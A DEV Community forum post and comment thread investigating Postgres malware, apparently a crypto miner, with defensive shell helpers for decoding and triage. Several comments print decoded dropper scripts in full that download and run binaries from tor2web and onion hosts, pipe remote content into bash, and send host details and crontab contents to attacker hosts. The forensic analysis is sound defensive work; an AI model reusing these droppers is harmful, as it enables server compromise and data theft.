DEV Community


Investigation into Postgres malware (hack?)

sanchitsharma on March 20, 2020

A database machine I was handling got infected by a malware, potentially a crypto miner, via a feature in Postgres. This feature, due to our recent...
Daniel Waller (he/him) • Edited

Hey!
Have you looked at the base64 encoded payload at all?

The long string that is being echoed is piped into base64 -d which decodes the base64 and the result is piped into bash for execution.

The decoded payload that is piped into bash is the following script (click here if gist doesn't load):

To correctly assess your situation and the impact this might have had on your systems and users you should definitely take a look to see what effects on your server and data this script might have had.
A very nice tool for this kind of forensic work is GCHQ's CyberChef. It has lots of functions for encoding and decoding different formats.

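A small helper for doing what Daniel describes without executing anything: it pulls the base64 blob out of a captured `echo ... | base64 -d | bash` one-liner, decodes it to a file for reading, and lists the hosts the decoded script refers to. This is an added example, not code from the post or any commenter; the input one-liner is whatever you captured from the database host.

```shell
#!/bin/sh
# Added example, not from the original post. Decodes a captured
# "echo <base64> | base64 -d | bash" line to a file instead of to a shell.

# decode_payload LINE OUTFILE: extract the first long base64 run from LINE,
# decode it into OUTFILE. Returns 1 if no blob was found or decoding failed.
decode_payload() {
  line=$1; out=$2
  blob=$(printf '%s\n' "$line" | grep -oE '[A-Za-z0-9+/=]{40,}' | head -n 1)
  [ -n "$blob" ] || return 1
  printf '%s' "$blob" | base64 -d > "$out" 2>/dev/null || return 1
}

# referenced_hosts FILE: unique hostnames mentioned in the decoded script,
# i.e. the download hosts to block and to search for in proxy/DNS logs.
referenced_hosts() {
  grep -oE '([a-z0-9-]+\.)+[a-z]{2,}' "$1" | sort -u
}
```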
Valts Liepiņš

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

t=tencentxjy5kpccv

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi
sanchitsharma

Thanks Valts, I have added a lightly commented (whatever I could understand) version to the post itself. Please comment if I might have done anything wrong there.

sanchitsharma

Thanks Daniel. Don't know why I missed the piping into the base64 -d command. I had never seen that command, so my brain missed it :D. This has become more interesting. I am looking into what this script is doing.

Daniel Waller (he/him) • Edited

Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D

M#3

Very interesting stuff! Thanks a lot for sharing your experience.

Thomas Werner

Interesting article and nice investigation work! I just checked the CVE you linked to, and it mentions that the exploit only works by connecting as postgres superuser.

Could you figure out how that exploit was executed in your case? Was it a weak postgres password, or maybe a default installation password? What did you do to tighten your server security?

sanchitsharma

No Thomas, we couldn't figure out how the exploit was executed, since we had a strong password in place even though the default postgres port was open. We set up firewall rules and added entries to the pg_hba file to allow access only from trusted machines.

Luis Omar

I know this is an old post, but in case you guys still wanted to know how the exploit was executed I'm going to leave this unit42.paloaltonetworks.com/pgmine....

And thank you again, the post and the comment turned out to be extremely helpful.

Cheers

komorebi • Edited

I had the same issue as well in three different isolated servers!

Thanks for the write-up. I spent a couple of hours trying to figure it out but I'm still scratching my head as to where the malware is coming from.

Our postgresql is running in a docker environment along with a strong password. On top of it, I am only using it for development.

dev-to-uploads.s3.amazonaws.com/i/...

Do you have any suggestion on strengthening the security?

Nico Troia

Thanks for this post. I was hit as well and traced it using the steps above.
Here is the decoded contents of the hidden file pgsql/.systemd-service.sh

exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "7jmrbtrvkgcqkldzyob4kotpyvsgz546yvik2xv4rpnfmrhe4imxthqd")

sockz() {
  n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
  p=$(echo "dns-query?name=relay.tor2socks.in")
  s=$($c https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -1)
}

fexe() {
  for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
  sockz
  f=/int.$(uname -m)
  x=./$(date|md5sum|cut -f1 -d-)
  r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
  $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
  chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su tor2web.io
do
  if ! ls /proc/$(head -1 /tmp/.X11-unix/01)/status; then
    fexe;u $t.$h
    ls /proc/$(head -1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
    ls /proc/$(head -1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
  else
    break
  fi
done
kalmen

Hi,
Thanks for the info,
I am facing the same malware attack, following up with the articles and trying to patch the leak. I'm not sure: after you deleted the files and folders, did the malware find its way back again?

I found that we need to delete the cron task as well. Under scheduled cron jobs, mine looks something like this: by user postgres, running this command: /var/lib/postgresql/.systemd-service.sh > /dev/null 2>&1 &

I am trying to find out why and how it created itself under my cron task.

And need to seal out all the potential leaks.
If any one of you have more info. or advice, please share, thanks a lot.

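A read-only triage script for the traces described in this thread: the hidden script in the database user's crontab (kalmen's comment), the PID marker file under /tmp/.X11-unix/ that both decoded droppers check, and the dropper's download-run-delete pattern (`chmod +x $x;$x;rm -f $x`), which leaves a running process whose executable no longer exists on disk. This is an added example, not code from the post or any commenter; the user name postgres and the marker directory are assumptions taken from the comments above, and each check accepts a directory argument so it can also be run against a mounted disk image.

```shell
#!/bin/sh
# Added triage helpers, not code from the original post or its comments. They
# look, read-only, for the traces the droppers quoted in this thread leave:
#   1. a cron line that runs a hidden file (e.g. ~postgres/.systemd-service.sh)
#   2. a PID marker file under /tmp/.X11-unix/ whose process is still alive
#   3. a running process whose executable was unlinked right after launch
#      (the dropper does "chmod +x $x; $x; rm -f $x")
# Directories are arguments so the checks also run against a copied image.

# 1. Reads crontab text on stdin, prints matching lines, exit 0 if any matched.
suspicious_cron() {
  grep -E '/\.[^/[:space:]]+([[:space:]]|$)'
}

# 2. DIR is normally /tmp/.X11-unix; files 00, 01, ... hold the miner's PID.
live_markers() {
  dir=$1; found=1
  for f in "$dir"/0[0-9]; do
    [ -f "$f" ] || continue
    pid=$(head -n 1 "$f" 2>/dev/null | tr -cd '0-9')
    [ -n "$pid" ] && kill -0 "$pid" 2>/dev/null && {
      echo "$f -> live pid $pid"; found=0; }
  done
  return $found
}

# 3. ROOT is normally /proc; lists PIDs whose exe link ends in "(deleted)".
deleted_exes() {
  root=$1; found=1
  for p in "$root"/[0-9]*; do
    exe=$(readlink "$p/exe" 2>/dev/null) || continue
    case $exe in
      *' (deleted)') echo "${p##*/} $exe"; found=0 ;;
    esac
  done
  return $found
}

# Run all three against the live host: sh triage.sh --run [dbuser]
if [ "${1:-}" = "--run" ]; then
  user=${2:-postgres}
  echo "== hidden files in crontab of $user"
  crontab -u "$user" -l 2>/dev/null | suspicious_cron
  echo "== live PID markers"
  live_markers /tmp/.X11-unix
  echo "== processes running a deleted executable"
  deleted_exes /proc
fi
```

A hit from check 3 is the miner itself if the PID matches the marker file from check 2; note the PID and grab `/proc/<pid>/exe` before killing it, since the file on disk is already gone.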
Mauricio López Coria

Excellent investigations. Thank you for sharing it. The same happened to a colleague and I'm trying to remove the malware files. By the way, can you list all files you had to delete?
Thank you, again.
Mauricio

pkim2

I just want to thank you as this was the clearest path for me to find why postgres was chewing up so many cycles. Not exactly the same (filenames, etc.), but the same pattern.

Thank you!

Luis Omar

Hi, thanks a lot for this post. It really helped me understand what's going on on my server.